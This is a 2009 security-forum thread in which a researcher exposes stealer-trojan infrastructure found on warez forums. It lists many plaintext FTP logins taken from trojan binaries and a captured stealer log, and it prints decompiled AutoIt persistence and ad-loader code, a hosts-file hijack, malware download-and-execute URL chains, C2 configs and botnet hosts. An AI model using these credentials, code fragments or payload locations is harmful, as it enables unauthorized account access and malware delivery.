Log In         


iStealer and HackHound Stealer FTP accounts and PHP Logger pages

']['€AM€LiT€ Forum - News, Reports and Alerts

 
AuthorMessage
 Vektor

  2009-06-27
  16:39:30
 
Quote
The following accounts are currently used by iStealer trojans, HackHound Stealer trojans and keyloggers that are binded to other executable files linked from various forums and blogs.

  1. FTP accounts:


    Many of these accounts still work, and in some cases you don't have the right to delete files from them. Use FTP Log Cleaner if you want to overwrite / delete all logs.

  2. PHP Logger pages:

  3. E-mail accounts:

____________________
 Vektor

  2009-07-08
  21:49:04
 
Quote
More trojan FTP's , PHP logger pages and PPI trojan hosts:
 Vektor

  2009-07-13
  21:44:29
 
Quote


I've also found a fake codec on many forums (example: rapidbyte.org , poster: qwerty420) written in AutoIt and I decompiled it. The trojan downloads a list of ads and possible update links from http://www.r2514124a.info/0/t.binx.php?hid=$HARDWAREID

$HARDWAREID wrote:
Func HARDWAREID()
Local $_OS, $_BIOS, $_NET, $_PRO
_COMPUTERGETOSS($_OS)
_COMPUTERGETBIOS($_BIOS)
_COMPUTERGETNETWORKCARDS($_NET)
_COMPUTERGETPROCESSORS($_PRO)
$SERIAL = $_OS[1][46]
$BIOS_VERSION = $_BIOS[1][24]
$MAC = $_NET[1][15]
Return MD5($SERIAL & $BIOS_VERSION & $MAC)
EndFunc


Quote:
Func INSTALL()
$COPY = FileCopy(@ScriptFullPath, @AppDataDir & "\svchost.exe", 1)
FileOpen(@AppDataDir & "\svchost.exe", 0)
$REG = RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "*svchostBoot", "REG_SZ", '"' & @AppDataDir & '\svchost.exe"')
If @ScriptName <> "svchost.exe" Then
$A = GETAFFILIATEID()
IniWrite($CONTROL_SAVE & "\save.ini", "stat", "credit", "False")
IniWrite($CONTROL_SAVE & "\save.ini", "stat", "a", $A[1])
IniWrite($CONTROL_SAVE & "\save.ini", "stat", "s", $A[2])
GIVECREDIT($COPY, $REG)
EndIf
EndFunc


Quote:
While 1
Sleep(30)
If TimerDiff($TAD) > $AD_DELAY Then
$AD_CONTROL = IniRead($CONTROL_SAVE & "\control.ini", "ads", "url", "")
If StringLeft($AD_CONTROL, 4) = "http" Then
$AD_URL = _INETGETSOURCE($AD_CONTROL & "?version=" & $VERSION & "&name=" & @ScriptName & "&_=" & TIME())
If Not @error And StringLeft($AD_URL, 4) = "http" Then
_RUNDOS("start " & $AD_URL)
EndIf
EndIf
$AD_DELAY = IniRead($CONTROL_SAVE & "\control.ini", "ads", "delay", "40")
$AD_DELAY = 1000 * 60 * $AD_DELAY
$TAD = TimerInit()
EndIf
 Vektor

  2009-07-17
  21:06:42
 
Quote
 Vektor

  2009-07-25
  11:39:49
 
Quote
  • FTP accounts:
  • PHP loggers:
  • E-mails and e-mail accounts:
  • BiFrost servers:

  • Poison Ivy servers:
    		•
     Vektor

      2009-08-01
      02:25:24
     
    Quote
    • FTP accounts used by trojans posted on public forums:
      • ftp://ftp.drivehq.com user: usechange password: manal20
        Source forum: http://warezscene.org , user: hideuser
      • ftp://muhaimin11.justfree.com user: muhaimin11 password: justvip
        Source forum: http://warezscene.org , user: muhaimin11
      • ftp://ftp.drivehq.com/My Documents user: myers97 password: halloween
        Source forum: http://warezscene.org , user: myers97
      • ftp://ftp.rapidsharze.com user: rockstar password: ifucktheworld
        Source forum: http://warezscene.org , user: shadeslader
      • ftp://82.197.131.52 user: tupact_logs password: 9Ge71Nb4by
        Source forum: http://warezscene.org , user: sigma6
      • ftp://ftp.drivehq.com user: aidenunder password: 00757757
        Source forum: http://warezscene.org , user: xxxsnoopyxxx
      • ftp://ftp.drivehq.com user: randyrkofu password: bhenchod
        Source forum: http://warezscene.org , user: dxwasim
      • ftp://ftp.drivehq.com user: tanpa.kekasih password: ongkek
        Source forum: http://warezscene.org , user: Bill610051
      • ftp://93.174.93.130 user: fusionpa password: uy32O33o7a
        Source forum: http://warez-bb.org , user: jaymm422
        He is the owner of fusionpassez.com , this is the FTP account for his forum (found in an .exe file infected with iStealer). This trojan spreader has the habit most trojan spreaders have, to upload the log file with own passwords on all FTP's used by trojans posted by them on public forums.
        ftp.fussionpasses.com-ftp_log wrote:
        Tue Jul 28 03:06:32 2009 0 124.190.93.163 7762 /home/fusionpa/DESKTOP_270709_1555.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:32 2009 0 124.190.93.163 353 /home/fusionpa/AD-DE7FCA454048_280709_0821.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:33 2009 0 124.190.93.163 3565 /home/fusionpa/LASTXP_280709_0019.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:33 2009 0 124.190.93.163 358 /home/fusionpa/LIFEBOOK-3BA884_270709_2226.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:34 2009 0 124.190.93.163 485 /home/fusionpa/MAIN_270709_1608.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:34 2009 0 124.190.93.163 1659 /home/fusionpa/MYM-TROTTERS_270709_1430.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:35 2009 0 124.190.93.163 426 /home/fusionpa/STARGATE_270709_2348.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:06:35 2009 0 124.190.93.163 477 /home/fusionpa/USER_270709_2234.html a _ o r fusionpa ftp 1 * c
        Tue Jul 28 03:17:45 2009 0 76.204.151.233 17324 /home/fusionpa/public_html/archive/index.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c
        Tue Jul 28 03:22:48 2009 0 76.204.151.233 16724 /home/fusionpa/public_html/includes/functions_digest.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c
        Tue Jul 28 03:23:07 2009 0 76.204.151.233 13882 /home/fusionpa/public_html/includes/functions_forumdisplay.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c
        Tue Jul 28 03:23:20 2009 0 76.204.151.233 55722 /home/fusionpa/public_html/includes/functions_newpost.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c
        Tue Jul 28 03:23:59 2009 0 76.204.151.233 55062 /home/fusionpa/public_html/clientscript/vbulletin_textedit.js a _ o r jaycrilla@fusionpassez.com ftp 1 * c
        Tue Jul 28 03:34:28 2009 0 76.204.151.233 456 /home/fusionpa/public_html/clientscript/yui/dev-readme.txt a _ o r jaycrilla@fusionpassez.com ftp 1 * c
        Tue Jul 28 04:07:41 2009 1 94.23.114.104 11115 /home/fusionpa/public_html/includes/visionscripts/psionic_hide/global_start.php a _ i r fusionpa ftp 1 * c

        Of course, "jay crilla" tested iStealers on himself and uploaded his log to all his FTP accounts,
        JAYCRILL_B05AD8_.txt wrote:
        ============================
                 File Zilla         
        ============================
        -------------------------
        Host:jaymm422.free-site-host.com
        Username:jaymm422
        Password:worthless
        -------------------------
        Host:freegameproject.at.ua
        Username:2freegameproject
        Password:postal2
        -------------------------
        Host:worthless.freewebhostx.com
        Username:worthless
        Password:worthless422
        -------------------------
        Host:jaymm422.blackapplehost.com
        Username:jaymm422
        Password:dank8091
        -------------------------
        Host:jaymm422.netau.net
        Username:a6738323
        Password:worthless1
        -------------------------

        All these accounts are currently used by iStealer trojans (FTP version and PHP Logger version).
      • ftp://193.92.33.194/httpdocs/logs/ user: rokasftp password: Lsn7U%Tg#E
        Source forum: http://warez-bb.org , user: heavenly war
      • ftp://ftp.testme.ezeserv.com user: vox@testme.ezeserv.com password: vox
        Source forum: http://warez-bb.org , user: tAAlz
      • ftp://ftp.wsuploads.info user: Hacker@wsuploads.info password: uevbs73
        ftp://ftp.wsbomb.nxserve.net user: logs@wsbomb.nxserve.net password: shammi
        Source forum: http://warezforum.info , user: jack*
        Files are binded with 2 trojans, each trojan with its FTP account.
      • ftp://ftp.deaglegames.com user: caneone password: Alex4868
        Source forum: http://warezforum.info , user: lildegregs22
        Another trojan spreader using the FTP for his websites in iStealer trojans. Google says that his website can "harm your computer". Well... what was on his FTP could had caused harm to your eyes. BTW his Poison Ivy server: caneone1.no-ip.biz:15963 .
      • ftp://ftp.drivehq.com user: SudaniZ password: hacker4ever
        Source forum: http://warezforum.info , user: RainBow96
      • ftp://ftp.drivehq.com user: philk3393 password: motorola99
        Source forum: http://warez-bb.org , user: aldelorien
      • ftp://Files9.cyberlynk.net user: viclogs password: viclogs
        Source forum: http://warez-bb.org , user: dr.indian
        Another dotCrap extractor of Nirsoft "tools" which, of course, crashes on most systems before sending anything to FTP (compiled: C:\Programme\Microsoft Visual Studio\VB98\sample\Buts LiteStealer v.1\Projekt1.vbp ). But that's not a problem, the trojan spreader also binded an iStealer that uses same account.
        XLWAO.exe wrote:
        Scene-CoderZ LS c0ded by w0red!
        [Daten]
        1-:-Files9.cyberlynk.net-:-viclogs-:-viclogs-:--:-
        1-:-1-:-1-:-1-:-1-:-1-:-1-:-1-:-1-:-1-:-1-:-0-:-
        0-:-Error 42342-:-An Error occured. The program must be closed!-:-Normal-:-0-:-0-:-g34tg3gerrgfbv-:--:-1-:-
        0-:-0-:-0-:-0-:-1-:-1-:-
        0-:-0-:-minut-:-
        0-:-dltxt-:-1-:-
        [Daten]

      • ftp://ftp.drivehq.com/My Music user: ghyll password: lancej
        Source forum: http://warez-bb.org , user: LostArch
        Some plain text from stealer's .exe file (which is another dotCrap extractor of Nirsoft tools):
        Temp\2.exe wrote:
        @@NN@@ftp.drivehq.com@@NN@@ghyll@@NN@@lancej@@NN@@10@@NN@@My Music@@NN@@true@@NN@@false|@@NN@@false@@NN@@active

      • ftp://ftp.desirockerz.info user: hhstealer@desirockerz.info password: james007bond
        Source forum: http://warez-bb.org , user: guzar
      • ftp://haz-one.justfree.com user: haz-one password: 0139940751
        Source forum: http://warez-bb.org , user: haz-one
      • ftp://patta.justfree.com user: patta password: patta
        Source forum: http://warez-bb.org , user: lummy
      • ftp://ftp.drivehq.com user: satjoy password: sat456321
        Source forum: http://warez-bb.org , user: Mr.mohamed
      • ftp://ftp.drivehq.com user: mudassar0529 password: sadafvuskp
        Source forum: http://warez-bb.org , user: purpule lover
      • ftp://ftp.conanthum.info user: cyber95@inter-defi.com password: 666666
        Source forum: http://warez-bb.org , user: sate.padang
      • ftp://brijendrasial.freehostia.com user: brisia7 password: lucky2
        Source forum: http://warez-bb.org , user: sialbrijendra (compiled: C:\Documents and Settings\iZac\Desktop\AuraStomper\Reveal\Project1.vbp)
      • ftp://ftp.drivehq.com user: trythisone password: nukeblast
        Source forum: http://warez-bb.org , user: a7081a
      • ftp://mina.hostei.com user: a3982170 password: B7ZJwWN558
        Source forum: http://warez-bb.org , user: aadukiki
      • ftp://ftp.rapidshare.co.cc user: rapidcc password: 0100209631lmao
        Source forum: http://warez-bb.org , user: Gilon
      • ftp://ftp.drivehq.com user: mriran password: ftp123456789
        Source forum: http://warez-bb.org , user: loglives
      • ftp://testing.bplaced.net user: testing password: testing
        Source forum: http://warez-bb.org , user: owleye
      • ftp://games2.nsw.ausnetservers.com.au/home/scrimzon user: scrimzon password: #Ql29CYK1;CX
        Source forum: http://warez-bb.org , user: SlixX123698741
      • ftp://bz-web.de user: web4f1 password: zNc0Xgss
        Source forum: http://warez-bb.org , user: vossyger
        Local path to trojan spreader's "project": C:\Programme\Microsoft Visual Studio\VB98\steam.vbp . You must have Steam installed or else it crashes.
      • ftp://ftp.drivehq.com user: sparkliquid password: 890908
        Source forum: http://warez-bb.org , user: sparkliquid
        Ardamax keylogger.
      • ftp://ftp.drivehq.com user: whatishappening password: whatishappening
        Source forum: http://warezscene.org , user: The uploader
        Ardamax keylogger.
      • ftp://madafaka.0catch.com user: madafaka.0catch.com password: samsung
        Source forum: http://warezscene.org , users: Pirated and sandiyo
        This trojan extracts 2 files, M5NH4CK3R.EXE (Ardamax keylogger) and MSNSPY.exe (AutoIT program).
        Code:
        While 1
            $msg = GUIGetMsg()
            Select
              case $msg = $GUI_EVENT_CLOSE
                ExitLoop
                case $msg = $buttonstart
                        GUICtrlSetData ($progbar, 1)
                        GUICtrlCreateLabel("Initialisiere...", 120, 50)
                        Sleep(1000)
                        GUICtrlSetData ($progbar, 10)
                        Sleep(1000)
                        GUICtrlSetData ($progbar, 15)
                        GUICtrlCreateLabel("Verbinde mit Server...", 120, 65)
                        Sleep(2500)
                        GUICtrlSetData ($progbar, 20)
                        Sleep(1000)
                        GUICtrlSetData ($progbar, 40)
                        GUICtrlCreateLabel("Daten werden uebertragen...", 120, 80)
                        Sleep(1000)
                        GUICtrlSetData ($progbar, 45)
                        Sleep(1000)
                        GUICtrlSetData ($progbar, 56)
                        Sleep(1000)
                        GUICtrlSetData ($progbar, 60)
                        Sleep(1000)
                        GUICtrlSetData ($progbar, 65)
                        GUICtrlCreateLabel("Verbinde zu Chatpartner...", 120, 95)
                        sleep(1000)
                        GUICtrlSetData ($progbar, 70)
                        Sleep(1000)
                        GUICtrlSetData ($progbar, 75)
                        Sleep(1000)
                        GUICtrlSetData ($progbar, 75)
                    Sleep(1000)
                        GUICtrlSetData ($progbar, 75)
                        GUICtrlCreateLabel("!!unknown error!!", 120, 110)
                        sleep(1000)
                        GUICtrlSetData ($progbar, 65)
                        sleep(1000)
                        GUICtrlSetData ($progbar, 50)
                        sleep(1000)
                        GUICtrlSetData ($progbar, 10)
                        sleep(1000)
                        GUICtrlSetData ($progbar, 0)
                        GUICtrlCreateLabel("   Please report to support@msnspy.biz", 110, 125)
                        sleep(1000)
              case $msg = $buttonstop
            EndSelect
        Wend

      • ftp://ftp.t35.com user: jesuschristinmyass.t35.com password: voide123
        Source forum: http://warez-bb.org , user: burNzw
      • ftp://applications.justfree.com user: applications password: 24091992
        Source forum: http://warez-bb.org , user: Mposter
      • ftp://gamergalaxy2.blackapplehost.com user: gamergalaxy2 password: 321098
        Source forum: http://warez-bb.org , user: SimeCro
      • ftp://bbwarez.servegame.org user: bbwarez password: admin
        Source forum: http://warez-bb.org , user: tomahawk_1987
      • ftp://76.73.37.130 user: sayem password: 123456
        Source forum: http://warez-bb.org , user: ViRtUaloRd HacKeR (without_clone.exe)
      • ftp://belmacha.justfree.com user: belmacha password: belma123
        Source forum: http://warez-bb.org , user: xillion


    • PHP loggers:


    • E-mail accounts:


    • Other trojans:
      • FaceBook Freezer.exe
        Source forum: http://warez-bb.org , user: m0n
        WinRAR SFX which overwrites %systemroot%\drivers\etc\hosts with this file:
        Code:
        # HACK3R

        127.0.0.1       localhost

        127.0.0.1       www.facebook.com
        127.0.0.1       facebook.com

        127.0.0.1       www.aol.com
        127.0.0.1       aol.com

        127.0.0.1       www.hotmail.com
        127.0.0.1       hotmail.com

        127.0.0.1       www.yahoo.com
        127.0.0.1       yahoo.com

        127.0.0.1       www.gmail.com
        127.0.0.1       gmail.com

        127.0.0.1       login.live.com
        127.0.0.1       mail.live.com
        127.0.0.1       login.yahoo.com

        127.0.0.1       www.rapidshare.com
        127.0.0.1       rapidshare.com

        127.0.0.1       www.cyberserg.com
        127.0.0.1       cyberserg.com

        127.0.0.1       www.albwzone.com
        127.0.0.1       albwzone.com

        Code:
        ;The comment below contains SFX script commands

        Path=C:\windows\system32\drivers\etc\
        SavePath
        Silent=1
        Overwrite=1

      • file.exe
        Source forum: http://warez-bb.org , user: r0r
        This trojan downloads and executes anything that can be found at any of these addresses: http://82.98.235.70/443 , http://65.243.103.80/80
      • SSM.exe (compiled: C:\Users\Bodeezy\Desktop\IMPROTOOLS\SSM UPDATE\SSM\SSM\obj\Release\SSM.pdb )
        Source forum: http://warez-bb.org , user: billuk3
        I posted before about this trojan, it is an encrypted dotCRAP program which calls PPC links (link list source: http://www.itsrunbytools.com/s/WE/0035/info.php), and it has a GUI which normally is not shown. However, there are ways to make it visible. Screenshot:
        http://img204.imageshack.us/img204/2748/dotcrap.jpg
      • svhost.exe , lsaas.exe
        Source forums: http://warezforum.info, http://wrzboard.org user: talkativr4 , http://warezvb.org , user: dancerick
        This trojan is usually extracted and executed by a NSIS installer, and it is a NSIS installer itself which executes "net stop WSCSVC" then downloads and executes a file from http://zaupdt.com/adminpriv/ap .
        http://zaupdt.com/adminpriv/ap redirects to http://tinyurl.com/kjbqgd/ , which redirects to http://hosting-for-free.info/uploads/1247667284.exe (VirusTotal) (for more samples, reports with earnings, logs, screenshots, etc. visit the rapidtrojan website)

        1247667284.exe is a dropper for cfmon.exe (rootkit) and service.exe (downloader)

        Service.exe has these hardcoded download links and paths (it will download, save and execute everything):
        • http://chifcwbifg.com/progs/wirfjaosw/eocptxyc.php?adv=adv797 (195.2.253.241 at the time I checked it)
        • http://dhfpvnxgfw.net/progs/wirfjaosw/eocptxyc.php?adv=adv797 (195.2.253.243 at the time I checked it)
        • http://chifcwbifg.com/progs/wirfjaosw/xhuyph.php
          http://dhfpvnxgfw.net/progs/wirfjaosw/xhuyph.php
          c:\pnhipken.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess)
        • http://chifcwbifg.com/progs/wirfjaosw/ekkofxb.php
          http://dhfpvnxgfw.net/progs/wirfjaosw/ekkofxb.php
          c:\gjdnse.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess)
        • http://chifcwbifg.com/progs/wirfjaosw/slvanev.php
          http://dhfpvnxgfw.net/progs/wirfjaosw/slvanev.php
          c:\khquid.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess)
        • http://chifcwbifg.com/progs/wirfjaosw/zwjbfj.php
          http://dhfpvnxgfw.net/progs/wirfjaosw/zwjbfj.php
          c:\fhntweri.exe (dropper for bcfaadfdadacf.dll, which creates a remote thread in Winlogon.exe that gets a list with instructions from wl.genseck.com)
        • http://chifcwbifg.com/progs/wirfjaosw/udvvmquz.php
          http://dhfpvnxgfw.net/progs/wirfjaosw/udvvmquz.php
          c:\rlmnkvyl.exe (rootkit installer for aec.sys)
        • http://chifcwbifg.com/progs/wirfjaosw/isgtklct.php
          http://dhfpvnxgfw.net/progs/wirfjaosw/isgtklct.php
          c:\vfjmbvbg.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess)
        • http://chifcwbifg.com/progs/wirfjaosw/nxkoyp
          http://dhfpvnxgfw.net/progs/wirfjaosw/nxkoyp
        • http://dhfpvnxgfw.net/progs/wirfjaosw/
          http://chifcwbifg.com/progs/wirfjaosw/
        • http://chifcwbifg.com/progs/wirfjaosw/isgtklct.php
        • http://chifcwbifg.com/progs/wirfjaosw/nxkoyp
        • http://chifcwbifg.com/progs/wirfjaosw/xhuyph.php
        • http://chifcwbifg.com/progs/wirfjaosw/ekkofxb.php
        • http://chifcwbifg.com/progs/wirfjaosw/slvanev.php
        • http://chifcwbifg.com/progs/wirfjaosw/zwjbfj.php
        • http://chifcwbifg.com/progs/wirfjaosw/udvvmquz.php
        • http://chifcwbifg.com/progs/wirfjaosw/isgtklct.php
        • http://chifcwbifg.com/progs/wirfjaosw/eocptxyc.php?adv=adv797


        Received configuration file from wl.genseck.com (206.161.205.220):
        Code:
        r_startup_delay=400
        config_update_period=84600
        config_url_0=http://wl.genseck.com/v306/logo.jpg
        config_url_1=http://wl.igoesto.com/v306/logo.jpg
        config_url_2=http://wl.remiusa.com/v306/logo.jpg
        config_url_3=http://209.9.171.251:43543/wl/v306/logo.jpg
        config_url_count=4
        config_url_tries_0=6
        config_url_tries_1=4
        config_url_tries_2=2
        config_url_tries_3=1
        config_version=1
        create_time=2009-07-15 18:27:36:062
        id=5bc0f6a95ad5361fd397a445d2a68cf4
        last_config_update=1247672057
        wmid=cl991


        The file logo.jpg is a base64 encoded encrypted configuration file (encrypted then encoded to base64).

        http://chifcwbifg.com/progs/wirfjaosw/nxkoyp - dropper trojan, which downloads and executes files from these addresses:
        • http://chifcwbifg.com/uniq.php?id=1759469761&p=0
          text: ok
        • http://dhfpvnxgfw.net/aasuper0.php
          c:\imkmpuqp.exe (705 bytes, executable file compressed with FSG that does nothing more than call ExitProcess)
        • http://dhfpvnxgfw.net/aasuper1.php
          c:\tjwupb.exe
        • http://dhfpvnxgfw.net/aasuper2.php
          c:\blxwl.exe - WinRAR SFX, extracts and executes install.exe, which is a rootkit installer (glaide32.sys).
        • http://dhfpvnxgfw.net/aasuper3.php
          c:\poqj.exe - downloads an encrypted configuration file from http://iframr.com/plist.php?uid=a5c7124324cf02c4e03542310d0b3881 and 2 .exe's from http://download.microsoft-update-center.com:88/files/db.exe (compiled: D:\Documents and Settings\Administrator\Lb\dailybucks}\mycc\Project1.vbp) and http://installmoney.com/svchost.exe (cabinet SFX which extracts mshost.exe and mshost1.exe).

        More trojans are downloaded, like installscash.exe , luxecash.exe , dailybucks.exe , socks.exe , ppcmania.exe , bot.exe , calc.exe , ebatoria.exe , 242.exe , install_fafbf.exe etc.
        Yep, looks like a successor of "XP Antivirus" trojan.
      • vsutil.exe
        Source forum: http://warez-bb.org , users: famafair1 , stoptillu69
        A NSIS installer like the above, but the download address is different, this one downloads from http://zaupdt.com/adminpriv/ap
        http://zaupdate.com/security/en-us/vsmon -> http://tinyurl.com/nhdad9 -> http://anonymouse.org/cgi-bin/anon-www.cgi/http://tinyurl.com/m97nae/ -> http://anonymouse.org/cgi-bin/anon-www.cgi/http://z1.przeklej.pl/przo1740/0db7c2c5002285d84a7226f3/belgium8320.jpg (a renamed .exe)
      • mscoef.exe (compiled: D:\no-ip\nepal1.hopto.org\ri0t[v5] with rar,udp,ssyn\ri0t[v5] with rar,udp,ssyn\Debug\ri0t.pdb )
        Source forum: http://warezscene.org , user: hellomoto1234
        IRC botnet server: nepal.no-ip.biz (chat.smokeynet.org), channel #platform , key: t3sting , prefix for bots: [s0ft]*
     Vektor

      2009-09-12
      17:02:44
     
    Quote